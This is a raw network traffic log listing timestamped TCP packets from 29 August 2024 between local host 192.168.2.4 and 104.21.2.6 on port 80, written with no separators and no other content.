                                Aug 29, 2024 22:47:02.556474924 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556484938 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556500912 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556520939 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556541920 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556554079 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556569099 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556579113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556581020 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556588888 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556598902 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556600094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556611061 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556622028 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556622028 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556646109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556665897 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556667089 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556678057 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556689024 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556701899 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556709051 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556711912 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556716919 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556721926 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556735039 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556761026 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556775093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556787968 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556797981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556809902 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556813955 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556819916 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556829929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556837082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556840897 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556859970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556860924 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556870937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556870937 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556880951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556886911 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556898117 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556909084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.556912899 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556936979 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.556961060 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627202034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627213001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627219915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627275944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627275944 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627286911 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627296925 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627309084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627319098 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627321005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627331972 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627353907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627361059 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627366066 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627376080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627386093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627393007 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627397060 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627408981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627418995 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627441883 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627928972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627974987 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.627975941 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.627985954 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628014088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628035069 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628046036 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628056049 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628065109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628067017 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628077984 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628082991 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628087997 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628094912 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628098965 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628115892 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628122091 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628134012 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628142118 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628143072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628153086 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628182888 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628221989 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628233910 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628245115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628256083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628257036 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628267050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628278017 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628278017 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628303051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628304958 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628314018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628321886 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628324032 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.628343105 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.628365993 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629254103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629302025 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629390001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629401922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629411936 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629424095 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629424095 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629434109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629436970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629457951 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629461050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629471064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629478931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629481077 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629491091 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629501104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629504919 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629512072 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629523993 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629527092 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629530907 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629539013 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629549026 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629555941 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629559040 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.629586935 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.629610062 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642715931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642728090 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642739058 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642757893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642766953 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642769098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642781019 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642792940 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642796993 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642807961 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642810106 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642843008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642867088 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.642957926 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642968893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642978907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642991066 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.642993927 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643002033 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643016100 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643019915 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643027067 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643033981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643038988 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643049955 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643054962 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643069029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643079996 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643085957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643096924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643104076 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643106937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643121004 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643140078 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643182039 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643208981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643225908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643235922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643246889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643249035 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643259048 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643275023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643275976 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643285990 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643296957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643297911 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643311977 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643321037 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643322945 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643335104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643346071 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643357038 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643357992 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643368959 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643371105 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643385887 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643413067 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643621922 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643632889 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643644094 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643659115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643666029 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643671036 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643682003 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643688917 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643692970 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643712997 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643712997 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643732071 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643742085 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643743038 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643755913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643764973 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643767118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643778086 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643789053 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643793106 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643800020 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643805981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643819094 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643846989 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643846989 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643858910 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643870115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643881083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643884897 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643898010 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643898964 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643909931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643920898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643923044 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643933058 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643944025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643944979 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643954992 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643965960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643973112 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643976927 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.643985987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.643989086 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.644000053 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.644005060 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.644025087 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.644047022 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.713851929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713864088 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713879108 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713926077 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713928938 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.713937998 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713948011 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713956118 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.713956118 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.713958979 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.713989973 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714004993 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714010954 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714046955 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714097023 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714107037 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714117050 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714133978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714143991 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714155912 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714171886 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714179039 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714186907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714207888 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714212894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714221001 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714224100 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714251041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714258909 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714750051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714768887 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714781046 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714793921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714797020 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714822054 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714838982 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714875937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714886904 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714896917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714909077 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714911938 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714926004 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714960098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714970112 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714979887 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.714987040 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.714992046 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715001106 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715002060 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715012074 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715013981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715023994 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715039968 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715065002 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715071917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715084076 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715096951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715105057 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715107918 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715123892 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715130091 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715135098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715146065 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715152025 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715172052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715193033 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.715950012 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.715997934 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716074944 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716084957 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716095924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716105938 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716113091 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716123104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716126919 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716135025 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716144085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716152906 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716156006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716166973 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716171026 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716177940 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716196060 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716217041 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716217995 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716228962 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716243029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716252089 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716253996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.716267109 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.716285944 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729717016 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729728937 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729738951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729777098 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729784012 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729793072 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729799032 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729816914 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729821920 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729830027 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729840040 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729840994 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729851007 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729860067 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729883909 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729901075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729912043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729921103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729932070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:02.729938984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:02.729942083 CEST8049730104.21.2.6192.168.2.4
